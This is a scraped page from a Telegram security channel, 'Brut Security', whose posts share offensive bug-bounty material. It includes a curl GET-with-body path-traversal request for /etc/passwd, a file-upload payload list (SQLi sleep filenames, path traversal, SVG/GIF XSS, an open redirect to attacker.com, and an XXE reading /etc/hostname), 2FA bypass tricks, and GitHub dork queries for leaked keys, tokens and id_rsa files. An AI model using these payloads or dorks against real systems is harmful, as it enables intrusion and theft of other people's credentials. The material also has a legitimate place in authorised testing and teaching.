Brut Security
14.8K subscribers
941 photos
73 videos
287 files
985 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨


This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
πŸ‘9πŸ”₯4❀3πŸ₯°1
S3 Bucket Recon Method
πŸ‘17πŸ”₯2
JWT_Hacking.pdf
226.3 KB
πŸ”₯4
Attacking_AWS.pdf
1.6 MB
πŸ”₯4
Now you can detect phishing websites quickly with Nuclei❀

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3πŸ”₯3πŸ‘1
Pwning_the_Domain_DACL_Abuse_EBook.pdf
3.6 MB
❀3πŸ‘1πŸ”₯1
πŸ”₯8
πŸ–₯Chaining Vulnerabilities through File UploadπŸ–₯

SLQi⏳
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png


XSS⏳
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>


Open redirect ⏳
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
Please open Telegram to view this post
VIEW IN TELEGRAM
❀13πŸ‘6πŸ”₯1
Blind SQL Injection Detection and Exploitation (Cheat Sheet)
πŸ‘Ž4πŸ”₯2😁1
1711031051425.jpg
1.4 MB
πŸ”₯4❀1
2FA Bypass Techniques

1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
πŸ”₯12πŸ‘5
SQL injection Oneliner
πŸ”₯12πŸ‘4
πŸ”₯πŸ”₯Github-DorkπŸš€πŸš€πŸ”₯πŸ”₯

Happy Hunting

πŸ” api_key
πŸ” app_AWS_SECRET_ACCESS_KEY
πŸ” app_secret
πŸ” authoriztion
πŸ” Ldap
πŸ” aws_access_key_id
πŸ” secret
πŸ” bash_history
πŸ” bashrc%20password
πŸ” beanstalkd
πŸ” client secre
πŸ” composer
πŸ” config
πŸ” credentials
πŸ” DB_PASSWORD
πŸ” dotfiles
πŸ” .env file
πŸ” .exs file
πŸ” extension:json mongolab.com
πŸ” extension:pem%20private
πŸ” extension:ppk private
πŸ” extension:sql mysql dump
πŸ” extension:yaml mongolab.com
πŸ” .mlab.com password
πŸ” mysql
πŸ” npmrc%20_auth
πŸ” passwd
πŸ” passkey
πŸ” rds.amazonaws.com password
πŸ” s3cfg
πŸ” send_key
πŸ” token
πŸ” filename:.bash_history
πŸ” filename:.bash_profile aws
πŸ” filename:.bashrc mailchimp
πŸ” filename:CCCam.cfg
πŸ” filename:config irc_pass
πŸ” filename:config.php dbpasswd
πŸ” filename:config.json auths
πŸ” filename:config.php pass
πŸ” filename:config.php dbpasswd
πŸ” filename:connections.xml
πŸ” filename:.cshrc
πŸ” filename:.git-credentials
πŸ” filename:.ftpconfig
πŸ” filename:.history
πŸ” filename:gitlab-recovery-codes.txt
πŸ” filename:.htpasswd
πŸ” filename:id_rsa
πŸ” filename:.netrc password
πŸ” FTP
πŸ” filename:wp-config.php
πŸ” git-credentials
πŸ” github_token
πŸ” HEROKU_API_KEY language:json
πŸ” HEROKU_API_KEY language:shell
πŸ” GITHUB_API_TOKEN language:shell
πŸ” oauth
πŸ” OTP
πŸ” databases password
πŸ” [WFClient] Password= extension:ica
πŸ” xoxa_Jenkins
πŸ” security_credentials

#bugbountytips #GitHub
πŸ”₯6πŸ‘4
πŸ”₯5πŸ‘1
SQL Injection Auth Bypass
πŸ”₯6πŸ‘4πŸ₯°1πŸ‘1
Deep Dive into Networking.pdf
9.3 MB
πŸ”₯4πŸ‘2